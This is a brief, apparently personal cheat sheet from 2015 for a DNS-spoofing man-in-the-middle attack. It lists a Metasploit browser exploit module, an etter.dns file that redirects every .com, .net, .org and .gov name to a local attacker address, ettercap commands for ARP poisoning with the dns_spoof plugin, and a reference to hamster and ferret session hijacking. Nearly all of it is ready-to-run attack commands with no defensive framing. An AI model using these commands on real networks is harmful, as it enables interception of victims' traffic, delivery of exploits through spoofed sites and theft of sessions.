27.04.2015

dns spoofing MITM

Commands:
exploit in MSF: windows/browser/ms10_046_shortcut_icon_d­llloader

etter.dns:

root@bt:/usr/share/ettercap# cat etter.dns
*.com A 192.168.217.133
*.net A 192.168.217.133
*.org A 192.168.217.133
*.gov A 192.168.217.133

ettercap command: ettercap -T -q -i eth0 -P dns_spoof // //

ettercap -T -Q -i wlan3 -M arp -P dns_spoof // //

hamster+ettercap-farret